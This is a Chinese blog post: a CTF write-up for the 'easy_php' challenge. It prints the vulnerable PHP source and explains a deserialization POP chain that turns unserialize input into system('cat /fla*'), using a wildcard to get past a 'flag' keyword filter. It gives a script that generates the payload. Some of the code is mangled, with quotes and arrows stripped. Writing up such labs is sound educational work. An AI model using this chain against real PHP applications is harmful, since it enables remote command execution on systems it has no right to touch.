当前位置：首页 > article >正文

【青少年CTF S1·2026 公益赛】easy_php

article 2026/4/13 3:34:26

?php // 屏蔽报错增加一点黑盒难度 error_reporting(0); // TIPS: FLAG在根目录下 class Monitor { private $status; private $reporter; public function __construct() { $this-status normal; $this-reporter new Logger(); } public function __destruct() { // 当对象销毁时如果状态是 danger则触发报警 if ($this-status danger) { $this-reporter-alert(); } } } class Logger { public function alert() { echo System normal. No alert needed.\n; } } class Screen { public $content; public $format; public function alert() { // 这里的调用看起来像是一个格式化输出 $func $this-format; return $func($this-content); } } // 入口点 if (isset($_GET[code])) { $input $_GET[code]; // 简单的过滤不允许直接输入 flag 关键字但这不影响反序列化过程 if (preg_match(/flag/i, $input)) { die(No flag here!); } unserialize($input); } else { highlight_file(__FILE__); } ?PHP 反序列化 (POP 链构造)题目入口点unserialize($_GET[code])存在反序列化漏洞。过滤preg_match(/flag/i, $input) 禁止输入中出现 flag 字符串。那么我们先寻找利用点下面这段代码想办法把$func变成system然后$this-content变成cat /flagpublic function alert() { // 这里的调用看起来像是一个格式化输出 $func $this-format; return $func($this-content); }那么我们如何调用Screen类下的alert()函数呢可以看到在Monitor中会调用alert()函数public function __destruct() { // 当对象销毁时如果状态是 danger则触发报警 if ($this-status danger) { $this-reporter-alert(); } }但是这里有一个问题在Monitor的构造函数中发现$this-reporter new Logger()reporter会new Logger()但是这个Logger不是我们想要的public function __construct() { $this-status normal; $this-reporter new Logger(); }因此我们要想办法将Logger替换为Screen最后Monitor销毁的时候会自动调用__destruct()实现攻击思路整理如下我们需要做的事情 1、在Screen类中将$format system 将$content cat /flag 2、在Monitor类中将$status danger 将$reporter new Screen()我的payload如下?php class Monitor { private $status; private $reporter; public function __construct() { $this-status danger; $this-reporter new Screen(); # new 一个对象的话必须要使用__construct,不能直接赋值给静态变量 } } class Screen { public $content cat /fla*; # 通过通配符绕过flag过滤 public $format system; # 静态变量可以直接这样赋值 } $exp new Monitor(); echo(urlencode(serialize($exp))); ?下面是原作者的图这里我直接本机演示下我的payload是否可行尝试执行whoami命令是正常可用的

【青少年CTF S1·2026 公益赛】easy_php

相关文章：

【青少年CTF S1·2026 公益赛】easy_php

Serilog：从结构化日志认知到 .NET 工程落地何

Spring Cloud进阶--分布式权限校验OAuth淄

ANARCI抗体序列编号终极指南：从零基础到实战应用的完整教程

嵌入式轻量级调试库：零开销DEBUG_PRINT实现原理

警惕AI患上“讨好症”：来自图灵奖得主Bengio的揭秘

小白也能玩转AI绘画：Anything V5镜像保姆级部署教程

东方仙盟神识训练工具专业训练-[AI人工智能(八十七)]—东方仙盟

pybind11项目实战：从C++源码到带完整类型提示的Python包，一步都不少

dplyr和tidyr用法继

【CD4022八进制计数器脉冲分配器】2023-5-31

Function Calling详解：让AI连接现实世界

【51单片机非精准计时2个外部中断启停】2023-5-29

JaCoCo在CI/CD流水线中的应用：自动化测试与质量门禁终极指南

技术判断力之AI三问峭

PDE (Processing D Editor) 三维场景编辑器 · 软件白皮书 · 基于 v..德

如何用WebSocket构建高性能物联网实时通信系统：IoT-Technical-Guide完整指南

终极Undotree性能优化指南：让Vim撤销历史管理如丝般顺滑

量化入门-用Python筛选爆量上涨的股票酒

Laravel Cashier Stripe Webhook完整教程：实时处理支付事件

快速体验VoxCPM-1.5：一键脚本启动，开启语音合成之旅

RePKG终极指南：Wallpaper Engine资源解包与纹理转换完整方案

在同一个时间点，一个物体不能出现在两个地方。

大学c语言搜题app有哪些大学c语言搜题软件大全

motionEye 存储管理优化：自动清理与云备份策略终极指南

给STM32新手：别再死记硬背地址了，用结构体映射GPIOA寄存器（附验证代码）

vis跨平台部署指南：在Linux、macOS和BSD系统上的安装与配置终极教程

Elevator Saga终极指南：如何用JavaScript编程控制电梯运输系统

7天掌握强化学习：从零开始在FrozenLake环境中实现Q-learning算法的完整指南

终极Kinto权限系统完全指南：如何精细控制数据访问与安全共享